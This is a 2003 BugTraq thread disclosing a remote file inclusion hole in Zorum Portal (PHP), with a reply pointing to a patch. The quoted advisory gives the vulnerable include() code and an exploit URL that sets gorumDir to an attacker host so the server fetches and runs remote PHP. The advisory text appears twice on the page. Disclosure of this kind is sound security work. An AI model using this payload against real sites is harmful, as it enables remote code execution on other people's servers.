BugTraq
Back to list
|
Post reply
Re: Zorum Portal (PHP)
Jan 26 2003 07:03PM
Frog Man (leseulfrog hotmail com)
(1 replies)
A patch has been created for this hole and can be found on
http://www.phpsecure.org/.
>From: MGhz <magas (at) mail (dot) lt [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Zorum Portal (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magas (at) mail (dot) lt [email concealed]
_________________________________________________________________
[ reply ]
Re[2]: Zorum Portal (PHP)
Jan 29 2003 04:39AM
Messer (igmpfrag dezigner ru)
(1 replies)
Re: Zorum Portal (PHP)
Jan 29 2003 08:12PM
MightyE (mightye mightye org)
Privacy Statement
Copyright 2010, SecurityFocus
http://www.phpsecure.org/.
>From: MGhz <magas (at) mail (dot) lt [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Zorum Portal (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magas (at) mail (dot) lt [email concealed]
_________________________________________________________________
[ reply ]